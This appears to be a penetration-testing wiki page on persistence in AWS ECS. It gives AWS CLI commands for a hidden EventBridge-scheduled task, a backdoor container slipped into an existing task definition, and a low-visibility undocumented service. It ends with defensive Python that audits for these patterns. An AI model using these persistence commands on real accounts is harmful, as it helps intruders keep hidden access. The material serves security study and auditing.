AWS - ECS Persistence


ECS

For more information check:

Hidden Periodic ECS Task

TODO: Test

An attacker can create a hidden periodic ECS task by using Amazon EventBridge to schedule the execution of a malicious task at regular intervals. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'

Backdoor Container in Existing ECS Task Definition

TODO: Test

An attacker can add a stealthy backdoor container to an existing ECS task definition so that it runs alongside the legitimate containers. The backdoor container can be used for persistence and for performing malicious activities.

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Undocumented ECS Service

TODO: Test

An attacker can create an undocumented ECS service that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
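
From the defender's side, the three patterns above (a scheduled EventBridge target, a container added to an existing task definition, a task with logging disabled) can be audited from configuration data. The following is an added example, not part of the original page: the function names are hypothetical, the sample data is constructed from the placeholder names used above, and the inputs are assumed to be the `taskDefinition` object from `aws ecs describe-task-definition` and the `Targets` list from `aws events list-targets-by-rule`.

```python
# Added audit example. Inputs mirror AWS CLI JSON output; sample data is constructed.

def added_or_changed_containers(old_td, new_td):
    """Diff two task definition revisions: new containers and swapped images."""
    old = {c["name"]: c for c in old_td["containerDefinitions"]}
    findings = []
    for c in new_td["containerDefinitions"]:
        prev = old.get(c["name"])
        if prev is None:
            findings.append((c["name"], "new container", c["image"]))
        elif prev["image"] != c["image"]:
            findings.append((c["name"], "image changed", c["image"]))
    return findings

def unlogged_containers(td):
    """Containers with no logConfiguration produce no log stream to review."""
    return [c["name"] for c in td["containerDefinitions"]
            if not c.get("logConfiguration")]

def scheduled_ecs_targets(rule_name, targets):
    """EventBridge targets that launch ECS tasks (they carry EcsParameters)."""
    return [(rule_name, t["Id"], t["EcsParameters"]["TaskDefinitionArn"])
            for t in targets if "EcsParameters" in t]

# Constructed sample data, reusing the placeholder names from the commands above.
LOGS = {"logDriver": "awslogs", "options": {"awslogs-group": "/ecs/existing-task"}}
OLD_REV = {"containerDefinitions": [
    {"name": "legitimate-container", "image": "legitimate-image:latest",
     "essential": True, "logConfiguration": LOGS}]}
NEW_REV = {"containerDefinitions": OLD_REV["containerDefinitions"] + [
    {"name": "backdoor-container", "image": "malicious-image:latest",
     "essential": False}]}
TARGETS = [
    {"Id": "malicious-ecs-task-target",
     "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
     "EcsParameters": {"TaskDefinitionArn":
         "arn:aws:ecs:region:account-id:task-definition/malicious-task",
         "TaskCount": 1}},
    {"Id": "notify", "Arn": "arn:aws:sns:region:account-id:ops-topic"},
]

if __name__ == "__main__":
    print(added_or_changed_containers(OLD_REV, NEW_REV))
    print(unlogged_containers(NEW_REV))
    print(scheduled_ecs_targets("malicious-ecs-task-rule", TARGETS))
```

Findings from the revision diff are most useful when compared against the deployment pipeline's record of intended changes, since a new revision registered outside that pipeline is the signal of interest.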